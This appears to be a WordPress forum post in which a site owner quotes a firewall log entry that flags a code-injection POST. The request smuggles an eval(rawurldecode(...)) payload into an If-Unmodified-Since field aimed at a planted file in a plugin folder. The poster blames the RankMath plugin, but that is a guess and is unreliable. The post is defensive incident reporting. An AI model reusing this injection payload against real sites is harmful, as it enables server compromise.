11/Mar/24 20:10:18 #1708853 CRITICAL 155 91.240.118.111 POST /wp-content/plugins/filebird-pro/vendor/enshrined/svg-sanitize/src/Exceptions/home_new.php - Code injection - [POST:If-Unmodified-Since = eval(rawurldecode("%20%24path%20%3D%20%27/home/microhost.gr/public_html/wp-content/plugins/seo-by-rank-math/includes/modules/redirections/class-debugger.php%27%3B%20%24ft%20...] - microhost.gr.zip the RankMath free and Pro folders from your server and upload it here on the thread. Do mention --- that the package is corrupt.
That is from the log. Its the first that i have in my log. If you read it carefully it says that (seo-by-rank-math/includes/modules/redirections/class-debugger.php) is infecting with bad code the filebird-pro/vendor/enshrined/svg-sanitize/src/Exceptions/home_new.php.
The eval was the bad code and in pic, you will see in the last line of the rankmath. All started from the infected rankmath by here.
My log is full of this tactic meaning that rankmath make code injection in several files.